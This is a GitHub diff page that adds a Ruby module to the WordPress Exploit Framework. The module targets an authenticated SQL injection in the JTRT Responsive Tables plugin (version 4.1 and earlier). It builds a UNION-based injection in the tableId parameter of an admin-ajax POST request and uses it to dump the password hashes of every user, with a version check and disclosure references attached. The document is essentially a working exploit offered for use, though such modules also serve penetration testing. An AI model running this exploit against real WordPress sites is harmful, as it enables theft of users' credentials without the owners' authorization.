This repository was archived by the owner on Oct 22, 2020. It is now read-only.
File tree Expand file tree Collapse file tree 1 file changed +69
-0
lines changed Expand file tree Collapse file tree 1 file changed +69
-0
lines changed Original file line number Diff line number Diff line change
1
+ # frozen_string_literal: true
2
+
3
+ class Wpxf ::Auxiliary ::JtrtResponsiveTablesHashDump < Wpxf ::Module
4
+ include Wpxf ::WordPress ::HashDump
5
+
6
+ def initialize
7
+ super
8
+
9
+ update_info (
10
+ name : 'JTRT Responsive Tables <= 4.1 Authenticated Hash Dump' ,
11
+ desc : %(
12
+ JTRT Responsive Tables <= 4.1 suffers from an SQL injection vulnerability
13
+ which is exploitable by registered users of any level.
14
+
15
+ This module utilises the vulnerability to dump the hashed passwords
16
+ of all users in the database.
17
+ ) ,
18
+ author : [
19
+ 'Lenon Leite' , # Disclosure
20
+ 'Rob Carr <rob[at]rastating.com>' # WPXF module
21
+ ] ,
22
+ references : [
23
+ [ 'WPVDB' , '8953' ] ,
24
+ [ 'URL' , 'http://lenonleite.com.br/en/blog/2017/09/11/jtrt-responsive-tables-wordpress-plugin-sql-injection/' ]
25
+ ] ,
26
+ date : 'Nov 11 2017'
27
+ )
28
+ end
29
+
30
+ def check
31
+ check_plugin_version_from_readme ( 'jtrt-responsive-tables' , '4.1.1' )
32
+ end
33
+
34
+ def requires_authentication
35
+ true
36
+ end
37
+
38
+ def reveals_one_row_per_request
39
+ true
40
+ end
41
+
42
+ def hashdump_request_method
43
+ :post
44
+ end
45
+
46
+ def hashdump_request_params
47
+ {
48
+ 'action' => 'get_old_table'
49
+ }
50
+ end
51
+
52
+ def hashdump_request_body
53
+ {
54
+ 'tableId' => "-#{ Utility ::Text . rand_numeric ( 2 ) } UNION #{ hashdump_sql_statement } #"
55
+ }
56
+ end
57
+
58
+ def hashdump_visible_field_index
59
+ 2
60
+ end
61
+
62
+ def hashdump_number_of_cols
63
+ 5
64
+ end
65
+
66
+ def vulnerable_url
67
+ wordpress_url_admin_ajax
68
+ end
69
+ end
You can’t perform that action at this time.
0 commit comments